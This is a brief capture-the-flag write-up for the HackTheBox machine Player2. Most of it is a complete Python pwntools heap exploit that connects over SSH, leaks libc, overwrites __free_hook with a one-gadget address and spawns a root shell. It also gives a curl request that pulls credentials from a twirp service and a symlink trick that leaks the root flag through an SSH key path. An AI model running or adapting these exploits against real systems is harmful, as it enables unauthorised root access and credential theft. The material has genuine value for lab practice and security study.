Player2 @ HackTheBox
Player2 @ HackTheBox
Player2 is a 50-point Linux machine on HackTheBox. For user we do some web fuzzing, call a twirp method to get credentials, find hidden backup totp codes, and then bypass a signature check on a firmware sample we can upload. Finally, subscribe to the running Mosquitto MQTT service to find a SSH private key. For Root there is an unintended way to use MQTT to leak the root flag or a Heap Exploit.
Notes
Get Credentials
1
curl --request "POST" --location "http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds" --header "Content-Type:application/json" --data '{"number": 1}' --verbose
Mosquitto Sub
1
mosquitto_sub -h 127.0.0.1 -v -t '$SYS/#'
Unintended Root (as observer)
1
2
mv id_rsa id_rsa.bak
ln -s /root/root.txt id_rsa
The Heap Exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/python
from pwn import *
import random
import string
import time
# Author: xct
def create_config(p, name='xct', desc_size=0, desc=''):
p.recvuntil('protobs@player2:~$')
p.sendline('2')
p.recvuntil(']:')
p.sendline(name)
p.recvuntil(']:')
p.sendline('')
p.recvuntil(']:')
p.sendline('')
p.recvuntil(']:')
p.sendline('')
p.recvuntil(']:')
p.sendline('')
p.recvuntil(']:')
p.sendline('')
p.recvuntil(']:')
p.sendline(str(desc_size))
p.recvuntil(']:')
p.send(desc)
def delete_config(p, index):
p.recvuntil('protobs@player2:~$')
p.sendline('4')
p.recvuntil(']:')
p.sendline(str(index))
def read_config(p, index):
p.recvuntil('protobs@player2:~$')
p.sendline('3')
p.recvuntil(']:')
p.sendline(str(index))
context.arch = 'amd64'
context.log_level = 'debug'
libc = ELF('./libc.so.6')
main = ELF('./Protobs')
BASE_OFFSET = 0x1EB9a8
FREE_HOOK = 0x1E75A8
ONE_GADGET = 0xe2383
s = ssh(host='10.10.10.170', user='observer', keyfile='observer.key')
p = s.run('/opt/Configuration_Utility/Protobs')
create_config(p, desc_size=72, desc='A'*64)
read_config(p, 0)
p.recvuntil("A"*(64))
leak = p.recvline()[:-1]
leak += b"\x00\x00"
leak = u64(leak)
base = leak-BASE_OFFSET
log.success('Leak: ' +hex(leak))
log.success('Libc-Base: '+hex(base))
idx = 1
create_config(p, desc_size=0x68, name='BBBB', desc='B'*(0x68)) #1
create_config(p, desc_size=0x68, name='CCCC', desc='C'*(0x68)) #2
create_config(p, desc_size=0x38, name='DDDD', desc='D'*(0x38)) #3
create_config(p, desc_size=0x20, name='ZZZZ', desc='Z'*(0x20)) #4
delete_config(p, idx+2)
delete_config(p, idx+1)
create_config(p, desc_size=0x68, name=b'M'*0x68+b'N'*8+p64(base+FREE_HOOK), desc=b'P'*(0x20))
create_config(p, desc_size=0x38, name=p64(0xcafebabe), desc=p64(base+ONE_GADGET))
delete_config(p, 0)
p.interactive()
p.close()
This post is licensed under CC BY 4.0 by the author.